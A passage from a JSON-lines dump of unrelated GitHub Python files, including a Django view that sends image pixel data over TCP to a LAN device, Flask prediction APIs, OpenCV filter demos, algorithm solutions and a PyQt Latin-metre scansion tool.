HttpResponseRedirect\nfrom django.http import HttpResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport socket\nimport sys\nimport PIL\nfrom PIL import Image\nfrom io import BytesIO\nimport base64\n\nclass HeroViewSet(viewsets.ModelViewSet):\n queryset = Hero.objects.all().order_by('name')\n serializer_class = HeroSerializer\n \n \n# def get(self, request):\n# a = 1+1\n# return 
HttpResponse('Albinos'+a) # Redirect after POST\n@csrf_exempt\ndef login(request):\n    if request.method == 'POST':\n        # Your code for POST\n        a = json.loads(request.body)\n        stringImagen = str(a['base64'])\n\n        # ------------------------ RESIZE IMAGE -------------------#\n        # adjust width and height to your needs\n        width = 240\n        height = 320\n\n        im1 = PIL.Image.open(BytesIO(base64.b64decode(stringImagen)))\n\n        im1.save(\"imagenBase64.jpg\")\n\n        # use one of these filter options to resize the image\n        im2 = im1.resize((width, height), PIL.Image.NEAREST) # use nearest neighbour\n        \n        im2.save(\"resized.jpg\")\n\n        # ------------------------ RGB MAPPING -----------------------#\n\n        rojo = list(im2.getdata(band=0))\n        verde = list(im2.getdata(band=1))\n        azul = list(im2.getdata(band=2))\n\n        file = open(\"rgb.txt\",\"w+\")\n        posX = 0\n        posY = 1\n        lista = []\n\n        for x in range(0,len(rojo)):\n\n            posX += 1\n\n            if rojo[x] > verde[x] and rojo[x] > azul[x]:\n                file.write(\"R\")\n                lista.insert(x, str(posX)+\"R\"+str(posY)+\"\\n\")\n            elif verde[x] > rojo[x] and verde[x] > azul[x]:\n                file.write(\"G\")\n                lista.insert(x, str(posX)+\"G\"+str(posY)+\"\\n\")\n            elif azul[x] > verde[x] and azul[x] > rojo[x]:\n                file.write(\"B\")\n                lista.insert(x, str(posX)+\"B\"+str(posY)+\"\\n\")\n            else:\n                file.write(\" \")\n\n            if posX == 240:\n                file.write(\"\\n\")\n                lista.insert(x, \"|\\n\")\n                posY +=1\n                posX = 0\n\n        \n        #file.write('\\n'.join(map(str, pixels)))\n\n        file.close()\n        \n        file2 = open(\"listaRGB.txt\",\"w+\")\n\n        file2.write(''.join(map(str, lista)))\n\n        file2.close()\n\n        with open('listaRGB.txt', 'r') as file:\n            data = file.read()\n\n\n        # ------------------------ SEND VIA UDP ------------------ #\n\n        # UPD_IP = \"192.168.1.9\"\n        # UPD_PORT = 4210\n        # MESSAGE = stringImagen\n\n        # chunks, chunk_size = len(stringImagen), len(stringImagen)//4\n        # [ stringImagen[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]\n\n        # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        # sock.sendto(bytes(MESSAGE, \"utf-8\"), (UPD_IP, UPD_PORT))\n\n        # ------------------------ SEND VIA TCP ------------------ #\n        TCP_IP = '192.168.1.13'\n        TCP_PORT = 5005\n        BUFFER_SIZE = 2\n        #MESSAGE = data;\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect((TCP_IP, TCP_PORT))\n        for x in range(0,len(lista)):\n            s.send(lista[x].encode('utf-8'))\n            if x != (len(lista)-1) :\n                dataRcv = s.recv(BUFFER_SIZE)\n                print((\"\"+str(dataRcv)), file=sys.stderr)\n\n        \n        #print(\"Goodbye cruel world!\", file=sys.stderr)\n        \n        print((\"Text correct\"), file=sys.stderr)\n        \n        s.close()\n\n        return HttpResponse('Received POST: '+str(a['base64']))\n    else:\n        # Your code for GET\n        return HttpResponse('Received GET')\n    \n\nfrom .serializers import ImagenSerializer\nfrom .models import Image\n\n\nclass ImagenViewSet(viewsets.ModelViewSet):\n    queryset = Image.objects.all()\n    serializer_class = ImagenSerializer\n    #return HttpResponse(\"Entered Image.\")\n","repo_name":"LuisLVar/Django-TCP","sub_path":"myapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3147424026","text":"import base64\n\nfrom flask import Flask, request, json \nfrom flask_restful import Resource, Api\n\nfrom classifier import CarDamageClassification\n\napp = Flask(__name__)\napi = Api(app)\n\nmodel = CarDamageClassification('models/')\n\nclass CarDamage(Resource):\n    def get(self):\n        return {'response': 'Use post method'}\n    \n    def post(self):\n        if 
request.headers['Content-Type'] == 'application/image':\n            req = request.data\n            image_decoded = base64.b64decode(req)\n            #print(type(image_decoded))\n            response = model.predict(image_decoded)\n            \n            return response\n\n        else:\n            return {'response': 'Incorrect header'}\n\n\napi.add_resource(CarDamage, '/predict')\n\nif __name__ == '__main__':\n    app.run(debug=False, host='0.0.0.0', port=7000)\n","repo_name":"kendalvictor/accident_severity_detection","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72461221802","text":"#Baekjoon 2116 - Dice stacking\n#the touching faces of vertically adjacent dice must show the same number\n#when all are stacked, maximize the sum of the numbers on the 4 side faces of each die\n#the first die may be placed in any orientation\nfrom sys import stdin\ninput=stdin.readline\nn=int(input()) #number of dice\ndice=[]\nrotate={0:5,1:3,2:4,3:1,4:2,5:0} #opposite face\nfor i in range(n):\n    dice.append(list(map(int,input().split())))\n\nmaxsum=0\nfor i in range(6): #when face i of the first die is placed on top\n    temp=[1,2,3,4,5,6] #values that can appear on the side faces\n    upper=dice[0][i]\n    temp.remove(dice[0][i]) #remove the top face value\n    temp.remove(dice[0][rotate[i]]) #remove the bottom face value\n    sum=max(temp)\n    for j in range(1,n): #from the second die to the last\n        temp=[1,2,3,4,5,6]\n        temp.remove(upper) #remove the bottom face value\n        up_idx=rotate[dice[j].index(upper)] #index of the top face\n        upper=dice[j][up_idx] #top face value\n        temp.remove(upper) #remove the top face value\n        sum+=max(temp)\n        if(j==n-1 and sum>maxsum): maxsum=sum\nprint(maxsum)\n\n","repo_name":"jinyoung7165/Python_Algorithm_Basic","sub_path":"01Greedy/2116.py","file_name":"2116.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27271860573","text":"from test.test_converters.resources.new_order_single import new_order_single_message\n\nfrom th2_common_utils.message_fields_access import * # noqa: F401, F403\n\n\ndef test_message_fields_access() -> None:\n    party_id_source = new_order_single_message.fields['TradingParty'].message_value.fields['NoPartyIDs']. 
\\\n        list_value.values[1].message_value.fields['PartyIDSource'].simple_value # noqa: ECE001\n\n    party_id_source_easy_access = new_order_single_message['TradingParty']['NoPartyIDs'][1]['PartyIDSource']\n\n    assert party_id_source_easy_access == party_id_source\n","repo_name":"th2-net/th2-common-utils-py","sub_path":"test/test_message_fields_access/test_message_fields_access.py","file_name":"test_message_fields_access.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"31996740763","text":"import math\n\n\nclass Punkt:\n    def __init__(self, x_wart, y_wart, nazwa=\"p\"):\n        self.x = x_wart\n        self.y = y_wart\n        self.nazwa = nazwa\n\n    def __str__(self):\n        return \"Punkt \" + self.nazwa + \"(\" + str(self.x) + \", \" + str(self.y) + \")\"\n\n\nclass Przeciecia:\n    # between consecutive points the plot consists of straight line segments,\n    # so the intersection points of the plots can be found by checking each such\n    # short segment between two points for both functions and looking for\n    # whether they cross between those two arguments\n    def przeciecia_punkty(self, krzywa1, krzywa2, przesuniecie=0):\n        n = len(krzywa1)\n        punkty = []\n        x_ret = []\n        y_ret = []\n        for i in range(n - 1):\n            p1k1 = Punkt(i + przesuniecie, krzywa1[i])\n            p2k1 = Punkt(i + 1 + przesuniecie, krzywa1[i + 1])\n            p1k2 = Punkt(i + przesuniecie, krzywa2[i])\n            p2k2 = Punkt(i + 1 + przesuniecie, krzywa2[i + 1])\n            a1, b1 = self.wyznacz_funkcje_liniowa(p1k1, p2k1)\n            a2, b2 = self.wyznacz_funkcje_liniowa(p1k2, p2k2)\n            if (a1 - a2) != 0:\n                x = (b2 - b1) / (a1 - a2) # the argument at which the intersection occurred\n                if i + przesuniecie <= x < i + 1 + przesuniecie:\n                    y = a1 * x + b1\n                    punkty.append(Punkt(x, y))\n                    x_ret.append(x)\n                    y_ret.append(y)\n\n        return x_ret, y_ret\n\n    def wyznacz_funkcje_liniowa(self, p1, p2):\n        # slope coefficient a\n        a = (p1.y - p2.y) / (p1.x - p2.x)\n        # intercept\n        b = p1.y - a * p1.x\n        return a, b\n\n    def zaokraglone_w_gore_arg_przec(self, punkty_x):\n        x_zaokr = []\n        for x in punkty_x:\n            x_zaokr.append(math.ceil(x)) # the nearest following day after the MACD and SIGNAL crossover\n        return x_zaokr\n","repo_name":"WonderWoman2020/MN-projekt-1","sub_path":"przeciecia.py","file_name":"przeciecia.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13362640014","text":"class Solution(object):\n    def permute(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        if not nums:\n            return []\n        ans = [[nums[0]]]\n        for v in nums[1:]:\n            tmp = []\n            for l in ans:\n                for i in xrange(len(l)+1):\n                    tmp.append(l[:i]+[v]+l[i:])\n            ans = tmp\n        return ans\n","repo_name":"ynXiang/LeetCode","sub_path":"046.Permutations/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6634325764","text":"# Variable scope in python\n\n# A variable scope is only available from inside the region where it is created\n\n# global scope = variable available from within any scope\n\n# local variable = variable created inside function\n\ncalculate_to_hours = 24\nname_of_unit = \"hours\"\n\n# def days_to_units(num_of_days, custom_message):\n#     print(f\"{num_of_days} days have {num_of_days * calculate_to_hours} {name_of_unit}\")\n#     print(custom_message)\n\n# days_to_units(35, \"Awesome\")\n# days_to_units(50, \"Fantastic\")\n# 
days_to_units(60, \"Great\")\n# days_to_units(20, \"Excellent\")\n\ndef scope_check():\n    my_var = \"variable inside function\"\n    print(name_of_unit) # global variable accessible\n    print(my_var)\n\nscope_check()\n","repo_name":"11anil/python","sub_path":"Scope.py","file_name":"Scope.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7339504051","text":"import cv2\nimport numpy as np\nimg = cv2.imread('lena_color_256.tif',1)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nrows,cols = img.shape[:2]\ncv2.imshow('Original',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#edge enhancement\nkernel_sharpen_3 = np.array([[-1,-1,-1,-1,-1],[-1,2,2,2,-1],[-1,2,8,2,-1],[-1,2,2,2,-1],[-1,-1,-1,-1,-1]])/8.0\noutput3=cv2.filter2D(img,-1,kernel_sharpen_3)\ncv2.imshow('Edge Enhancement',output3)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#emboss\nkernel_emboss1=np.array([[0,-1,1],[1,0,-1],[1,1,0]])\noutput=cv2.filter2D(gray,-1,kernel_emboss1)+128\ncv2.imshow('Emboss1',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#emboss2\nkernel_emboss2=np.array([[-1,-1,0],[-1,0,1],[0,1,1]])\noutput=cv2.filter2D(gray,-1,kernel_emboss2)+128\ncv2.imshow('Emboss2',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#emboss3\nkernel_emboss3=np.array([[1,0,0],[0,0,0],[0,0,-1]])\noutput=cv2.filter2D(gray,-1,kernel_emboss3)+128\ncv2.imshow('Emboss3',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#Sobel\nsobel_horizontal = cv2.Sobel(img,cv2.CV_64F, 1,0,ksize=5)\ncv2.imshow('Sobel horizontal',sobel_horizontal)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#Sobel2\nsobel_vertical = cv2.Sobel(img,cv2.CV_64F, 0,1,ksize=5)\ncv2.imshow('Sobel vertical',sobel_vertical)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#erode\nkernel_erode=np.ones((5,5),np.uint8)\nimg_erosion = cv2.erode(img,kernel_erode,iterations = 1)\ncv2.imshow('Erode',img_erosion)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#dilate\nimg_dilatation = cv2.dilate(img,kernel_erode,iterations = 1)\ncv2.imshow('Dilate',img_dilatation)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#vignette\nkernel_gauss_x= cv2.getGaussianKernel(cols,200)\nkernel_gauss_y = cv2.getGaussianKernel(rows,200)\nkernel = kernel_gauss_y * kernel_gauss_x.T\nmask=255*kernel/np.linalg.norm(kernel)\noutput=np.copy(img)\nfor i in range(3):\n    output[:,:,i]=output[:,:,i] * mask\ncv2.imshow('Vignette',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"SidhantAbap/ImageProcessing","sub_path":"Convolution/Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"5259109158","text":"from flask import Flask, Blueprint, render_template, request, app, redirect, url_for\nimport pickle\nimport json\nimport numpy as np\nimport pandas as pd \nimport sklearn\nfrom flask import Response\nfrom flask_cors import CORS\nfrom sklearn.preprocessing import StandardScaler\n\nstudentgrd = Blueprint('studentg', __name__)\n\n@studentgrd.route(\"/studentg\")\ndef studentg():\n    return render_template('students_grad.html')\n\n@studentgrd.route(\"/predict\", methods=['POST'])\ndef studentgroute():\n    try:\n        if request.json['data'] is not None:\n            data = request.json['data']\n            print('data is: ', data)\n            res = predict_log(data)\n            print('result is ', res)\n            return Response(res)\n    except ValueError:\n        return Response(\"Value not found\")\n    except Exception as e:\n        print('exception is ', e)\n        
return Response(e)\n\n# studentsandardScalar.sav StudentGradingmodelForPrediction.sav\ndef predict_log(dict_pred): \n with open(\"studentsandardScalar.sav\", 'rb') as f:\n scalar = pickle.load(f)\n\n with open(\"StudentGradingmodelForPrediction.sav\", 'rb') as f:\n model = pickle.load(f)\n\n data_df = pd.DataFrame(dict_pred, index=[1, ])\n scaled_data = scalar.transform(data_df)\n predict = model.predict(scaled_data)\n if predict[0] == 0:\n result = 'Very Poor'\n elif predict[0] == 1:\n result = 'Poor'\n elif predict[0] == 2:\n result = 'Below Average'\n elif predict[0] == 3:\n result = 'Average'\n elif predict[0] == 4:\n result = 'Very Good'\n else:\n result = 'Excellent'\n\n return result\n\n@studentgrd.route(\"/spridict\", methods=['POST'])\ndef spridict():\n if request.method == \"POST\":\n cse_math_score = request.form['cse_math_score']\n eee_score = request.form['eee_score']\n cse_deploy_score = request.form['cse_deploy_score']\n math_score = request.form['math_score']\n\n sprediction = predict_log(np.array([[cse_math_score, eee_score, cse_deploy_score, math_score]]))\n\n return render_template('students_grad.html', sprediction=\"Your Result is {}\".format(sprediction))\n else:\n return render_template('students_grad.html')\n\n\n\nif __name__ == '__main__':\n studentgrd.run(debug=True)\n","repo_name":"shariat-sunny14/ML-Al-Projects-in-One","sub_path":"studentg.py","file_name":"studentg.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12863265721","text":"import cv2\nimport numpy as np\nd=cv2.imread(\"D://opencv//d.jpg\")\nhsv=cv2.cvtColor(d,cv2.COLOR_BGR2HSV)\ncv2.imshow(\"d\",d)\ncv2.imshow(\"hsv\",hsv) \nminBule=np.array([50,100,100]) \nmaxBule=np.array([70,255,255])\nmask = cv2.inRange(hsv,minBule,maxBule)\nblue=cv2.bitwise_and(d,d,mask=mask)\ncv2.imshow(\"blue\",blue)\ncv2.waitKey()\ncv2.destroyAllWindows() \n","repo_name":"cristiano-xw/python","sub_path":"python/显示特定颜色.py","file_name":"显示特定颜色.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8721598985","text":"import os\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom core import *\n\n\nclass Form(QWidget):\n def __init__(self, parent=None):\n super(Form, self).__init__(parent)\n self.sorgente = \"\"\n self.versiDaFare = \"\"\n self.sorgente = \"\"\n self.scrivi = QTextEdit()\n self.scrivi.setMinimumHeight(250)\n self.risultato = QTextEdit()\n self.risultato.setMinimumHeight(250)\n self.setMinimumWidth(650)\n\n scegliFileLayout = QHBoxLayout()\n scegliButton = QPushButton(\"Apri..\")\n scegliButton.clicked.connect(self.scegliFile)\n self.tField = QLineEdit()\n self.tField.setDisabled(1)\n self.tField.textChanged.connect(self.cambiaPercorso)\n btnRisolvi = QPushButton(\"RISOLVI\")\n btnRisolvi.clicked.connect(self.iniziaRisoluzione)\n scegliFileLayout.addWidget(scegliButton)\n scegliFileLayout.addWidget(self.tField)\n self.listaVersi = QComboBox()\n self.listaVersi.setEditable(True)\n self.listaVersi.completer().setCompletionMode(QCompleter.PopupCompletion)\n self.listaVersi.completer().popup().setStyleSheet(\"margin: 5px\")\n self.listaVersi.addItem(\"--Scegli verso--\")\n self.listaVersi.insertSeparator(1)\n self.listaVersi.addItem(\"Esametro\")\n self.listaVersi.addItem(\"Pentametro\")\n self.listaVersi.insertSeparator(4)\n self.listaVersi.addItem(\"Endecasillabo falecio\")\n 
self.listaVersi.addItem(\"Trimetro giambico scazonte\")\n self.listaVersi.addItem(\"Asclepiadeo maggiore\")\n self.listaVersi.addItem(\"Asclepiadeo minore\")\n self.listaVersi.addItem(\"Endecasillabo saffico\")\n self.listaVersi.addItem(\"Adonio\")\n self.listaVersi.addItem(\"Gliconeo\")\n self.listaVersi.addItem(\"Ferecrateo\")\n self.listaVersi.insertSeparator(13)\n self.listaVersi.addItem(\"Enneasillabo alcaico\")\n self.listaVersi.addItem(\"Decasillabo alcaico\")\n self.listaVersi.addItem(\"Endecasillabo alcaico\")\n self.listaVersi.insertSeparator(17)\n self.listaVersi.addItem(\"Distico elegiaco\")\n self.listaVersi.addItem(\"Strofe saffica\")\n self.listaVersi.addItem(\"Strofe alcaica\")\n self.listaVersi.addItem(\"Strofe di gliconei e ferecratei I\")\n self.listaVersi.addItem(\"Strofe di gliconei e ferecratei II\")\n self.listaVersi.addItem(\"Prima strofe asclepiadea\")\n self.listaVersi.addItem(\"Seconda strofe asclepiadea\")\n mainLayout = QFormLayout()\n mainLayout.addRow(QLabel(\"Verso/strofa\"), self.listaVersi)\n mainLayout.addRow(QLabel(\"Scegli file\"), scegliFileLayout)\n mainLayout.addRow(None, QLabel(\"oppure\"))\n cleanLayout = QVBoxLayout()\n btnClear = QPushButton(\"Pulisci\")\n btnClear.clicked.connect(self.pulisciTesto)\n cleanLayout.addWidget(QLabel(\"Scrivi testo\"))\n cleanLayout.addStretch(1)\n cleanLayout.addWidget(btnClear)\n cleanLayout.setAlignment(Qt.AlignTop)\n layoutTemp = QHBoxLayout()\n layoutTemp.addLayout(cleanLayout)\n layoutTemp.addWidget(self.scrivi)\n salvaLayout = QVBoxLayout()\n btnSalva = QPushButton(\"Salva\")\n btnSalva.clicked.connect(self.salvaRisultato)\n layoutTempSalva = QHBoxLayout()\n salvaLayout.addWidget(QLabel(\"Risultato\"))\n salvaLayout.addStretch(1)\n salvaLayout.addWidget(btnSalva)\n salvaLayout.setAlignment(Qt.AlignTop)\n layoutTempSalva.addLayout(salvaLayout)\n layoutTempSalva.addWidget(self.risultato)\n mainLayout.addRow(layoutTemp)\n mainLayout.addRow(None, btnRisolvi)\n mainLayout.addRow(layoutTempSalva)\n self.setLayout(mainLayout)\n self.setWindowTitle(\"Metrica Latina\")\n\n def salvaRisultato(self):\n try:\n fname = QFileDialog.getSaveFileName(\n self, 'Salva file', \"output.txt\", \"File di testo (*.txt)\")\n out_file = open(fname[0], \"w\")\n daScrivere = self.risultato.toPlainText().replace(\"\", \"\").replace(\"\", \"\")\n out_file.write(daScrivere)\n out_file.close()\n except Exception:\n self.mostraErrore(\"Si è verificato un errore!\")\n else:\n self.mostraErrore(\"Salvataggio avvenuto con successo!\", 2, \"Info\")\n\n def cambiaPercorso(self):\n self.sorgente = self.tField.text().replace(\"...\", os.getcwd())\n\n def pulisciTesto(self):\n self.scrivi.setText(\"\")\n\n def mostraErrore(self, testo, tipo=0, titolo=\"Errore!\"):\n msg = QMessageBox()\n if tipo == 0:\n msg.setIcon(QMessageBox.Warning)\n elif tipo == 1:\n msg.setIcon(QMessageBox.Critical)\n elif tipo == 2:\n msg.setIcon(QMessageBox.Information)\n msg.setText(testo)\n msg.setWindowTitle(titolo)\n msg.setStandardButtons(QMessageBox.Ok)\n msg.buttonClicked.connect(msg.close)\n msg.exec_()\n\n def iniziaRisoluzione(self):\n self.risultato.setPlainText(\"\")\n if self.scrivi.toPlainText() != \"\":\n self.versiDaFare = self.scrivi.toPlainText().split(\"\\n\")\n else:\n self.mostraErrore(\n \"Nessuna sorgente valida selezionata. 
\\n Scegliere una sorgente valida.\")\n            return\n        scriviFuturo = []\n        count = 0\n        for versoOriginale in self.versiDaFare:\n            if self.listaVersi.currentText() == \"Esametro\":\n                verso = Esametro(versoOriginale)\n            if self.listaVersi.currentText() == \"--Scegli verso--\":\n                self.mostraErrore(\n                    \"Scegli un tipo di verso prima di continuare\")\n                return\n            if self.listaVersi.currentText() == \"Pentametro\":\n                verso = Pentametro(versoOriginale)\n            if self.listaVersi.currentText() == \"Endecasillabo saffico\":\n                verso = EndecasillaboSaffico(versoOriginale)\n            if self.listaVersi.currentText() == \"Adonio\":\n                verso = Adonio(versoOriginale)\n            if self.listaVersi.currentText() == \"Endecasillabo alcaico\":\n                verso = EndecasillaboAlcaico(versoOriginale)\n            if self.listaVersi.currentText() == \"Decasillabo alcaico\":\n                verso = DecasillaboAlcaico(versoOriginale)\n            if self.listaVersi.currentText() == \"Enneasillabo alcaico\":\n                verso = EnneasillaboAlcaico(versoOriginale)\n            if self.listaVersi.currentText() == \"Ferecrateo\":\n                verso = Ferecrateo(versoOriginale)\n            if self.listaVersi.currentText() == \"Gliconeo\":\n                verso = Gliconeo(versoOriginale)\n            if self.listaVersi.currentText() == \"Trimetro giambico scazonte\":\n                verso = TrimetroGiambicoScazonte(versoOriginale)\n            if self.listaVersi.currentText() == \"Endecasillabo falecio\":\n                verso = EndecasillaboFalecio(versoOriginale)\n            if self.listaVersi.currentText() == \"Asclepiadeo minore\":\n                verso = AsclepiadeoMinore(versoOriginale)\n            if self.listaVersi.currentText() == \"Asclepiadeo maggiore\":\n                verso = AsclepiadeoMaggiore(versoOriginale)\n            if self.listaVersi.currentText() == \"Distico elegiaco\":\n                if count % 2 == 0:\n                    verso = Esametro(versoOriginale)\n                    count += 1\n                else:\n                    verso = Pentametro(versoOriginale)\n                    count += 1\n\n            if self.listaVersi.currentText() == \"Strofe saffica\":\n                if count % 4 != 3:\n                    verso = EndecasillaboSaffico(versoOriginale)\n                    count += 1\n                else:\n                    verso = Adonio(versoOriginale)\n                    count += 1\n            if self.listaVersi.currentText() == \"Strofe di gliconei e ferecratei I\":\n                if count % 4 != 3:\n                    verso = Gliconeo(versoOriginale)\n                    count += 1\n                else:\n                    verso = Ferecrateo(versoOriginale)\n                    count += 1\n            if self.listaVersi.currentText() == \"Strofe di gliconei e ferecratei II\":\n                if count % 5 != 4:\n                    verso = Gliconeo(versoOriginale)\n                    count += 1\n                else:\n                    verso = Ferecrateo(versoOriginale)\n                    count += 1\n\n            if self.listaVersi.currentText() == \"Strofe alcaica\":\n                if count % 4 == 0 or count % 4 == 1:\n                    verso = EndecasillaboAlcaico(versoOriginale)\n                    count += 1\n                elif count % 4 == 2:\n                    verso = EnneasillaboAlcaico(versoOriginale)\n                    count += 1\n                else:\n                    verso = DecasillaboAlcaico(versoOriginale)\n                    count += 1\n\n            if self.listaVersi.currentText() == \"Prima strofe asclepiadea\":\n                if count % 4 != 3:\n                    verso = AsclepiadeoMinore(versoOriginale)\n                    count += 1\n                else:\n                    verso = Gliconeo(versoOriginale)\n                    count += 1\n            if self.listaVersi.currentText() == \"Seconda strofe asclepiadea\":\n                if count % 4 == 0 or count % 4 == 1:\n                    verso = AsclepiadeoMinore(versoOriginale)\n                    count += 1\n                elif count % 4 == 2:\n                    verso = Ferecrateo(versoOriginale)\n                    count += 1\n                else:\n                    verso = Gliconeo(versoOriginale)\n                    count += 1\n            try:\n                verso.dividiInSillabe()\n                soluzioni = verso.risolvi()\n            except VersoIncompatibile:\n                self.mostraErrore(\n                    \"Il tipo di verso selezionato non è compatibile con i versi della sorgente. 
\\nControllare che non vi siano errori nella sorgente e che il tipo di verso selezionato sia corretto.\", 1)\n self.risultato.setPlainText(\"\")\n break\n else:\n soluzioni = [x.replace(\"à\", \"à\")\n for x in soluzioni]\n soluzioni = [x.replace(\"è\", \"è\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ì\", \"ì\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ò\", \"ò\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ù\", \"ù\")\n for x in soluzioni]\n soluzioni = [x.replace(\"À\", \"À\")\n for x in soluzioni]\n soluzioni = [x.replace(\"È\", \"È\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ì\", \"Ì\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ò\", \"Ò\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ù\", \"Ù\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ý\", \"Ý\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ý\", \"ý\")\n for x in soluzioni]\n if len(soluzioni) == 0:\n self.risultato.append(\n \"\\t NESSUNA SOLUZIONE (\"+str(verso)+\")\")\n if len(soluzioni) == 1:\n self.risultato.append(soluzioni[0])\n else:\n [self.risultato.append(\"....\"+str(x)) for x in soluzioni]\n\n # self.risultato.setPlainText(\"\\n\".join(scriviFuturo))\n\n def scegliFile(self):\n fname = QFileDialog.getOpenFileName(\n self, 'Apri file', \"input.txt\", \"File di testo (*.txt)\")\n self.tField.setDisabled(0)\n self.tField.setText(fname[0].replace(os.getcwd(), \"...\"))\n self.sorgente = fname[0]\n if(os.path.isfile(self.sorgente)):\n file = open(self.sorgente)\n self.versiDaFare = [x.strip() for x in file.readlines()]\n if self.versiDaFare[0][0] == \"#\":\n index = self.listaVersi.findText(self.versiDaFare[0][1:])\n if index == -1:\n self.mostraErrore(\n \"Il tipo di verso specificato nel file non esiste. Controllare che sia scritto correttamente\")\n return\n self.listaVersi.setCurrentIndex(index)\n self.versiDaFare = self.versiDaFare[1:]\n self.scrivi.setPlainText(\"\\n\".join(self.versiDaFare))\n else:\n self.mostraErrore(\n \"Il file selezionato non esiste! 
\\n Scegliere un file esistente.\")\n            return\n\n\nif __name__ == '__main__':\n    import sys\n    app = QApplication(sys.argv)\n    screen = Form()\n    screen.show()\n    sys.exit(app.exec_())\n","repo_name":"CiccaGuru/metricalatina","sub_path":"Interfaccia.py","file_name":"Interfaccia.py","file_ext":"py","file_size_in_byte":13376,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"30716010073","text":"import pandas as pd\nimport re\nfrom datetime import datetime as dt\n\ndef create_figure(df):\n    return {\n        'data': [\n            dict(\n                x= df.index,\n                y= df[col],\n                mode= 'lines',\n                name= col,\n                type= 'scatter',\n                opacity= 0.7\n            ) for col in df.columns\n        ],\n        'layout': {\n            'transition': {'duration': 500},\n            'margin': {'l': 20, 'b': 20, 't': 20, 'r': 10},\n            'legend': {'x': 0 , 'yref': 'paper', 'y': 1, 'xref': 'paper', 'bgcolor': 'rgba(0,0,0,0)'}\n        }\n    }\n    \n\"\"\"\n'title': {\n    'text': 'Sensordata',\n    'xanchor': 'center',\n    'xref': 'paper',\n    'y': 0.98\n},\n\"\"\"\n\ndef resolve_dates(*args):\n    \"\"\"\n    If arguments are date strings, convert to dates, otherwise return None\n    \"\"\"\n    return tuple(\n        dt.strptime(re.split('T| ', date)[0], '%Y-%m-%d')\n        if date is not None else date\n        for date in args\n    )\n\ndef filter_by_hours(df, hour_ints):\n    \"\"\"Filter date indexed df by the hours (ints) in hour_ints\"\"\"\n    from datetime import time\n    first, last = tuple(map(time, hour_ints))\n    if first.hour != 0:\n        df = df[first <= df.index.map(lambda d: d.time())]\n    if last.hour != 23:\n        df = df[df.index.map(lambda d: d.time()) <= last]\n    return df # Could also use df.between_time(start_time, end_time), faster?\n\ndef aggregate_hours(df: pd.DataFrame, method: str = 'mean'):\n    \"\"\"Aggregate specified hours by method (mean, max, min or median)\"\"\"\n    df = df.groupby(df.index.date).agg({ col: [method] for col in df.columns })\n    df.index = pd.to_datetime(df.index)\n    df.columns = df.columns.droplevel(1)\n    return df\n\ndef aggregate_days(df: pd.DataFrame, method: str = 'mean'):\n    \"\"\"Aggregate days of the month by method, e.g. mean\"\"\"\n    df = df.groupby([pd.Grouper(freq='MS'), df.index.hour]).agg(\n        { col: [method] for col in df.columns}\n    )\n    df.index = df.index.map( lambda m: m[0].replace(hour=m[1]))\n    df.columns = df.columns.droplevel(1)\n    return df\n\ndef aggregate_months(df: pd.DataFrame, method: str = 'mean'):\n    \"\"\"Aggregate months of the year by method, e.g. sum\"\"\"\n    df = df.groupby([pd.Grouper(freq='Y'), df.index.day, df.index.hour]).agg(\n        { col: [method] for col in df.columns}\n    )\n    df.index = df.index.map( lambda m: m[0].replace(day= m[1], hour=m[2]) )\n    df.columns = df.columns.droplevel(1)\n    return 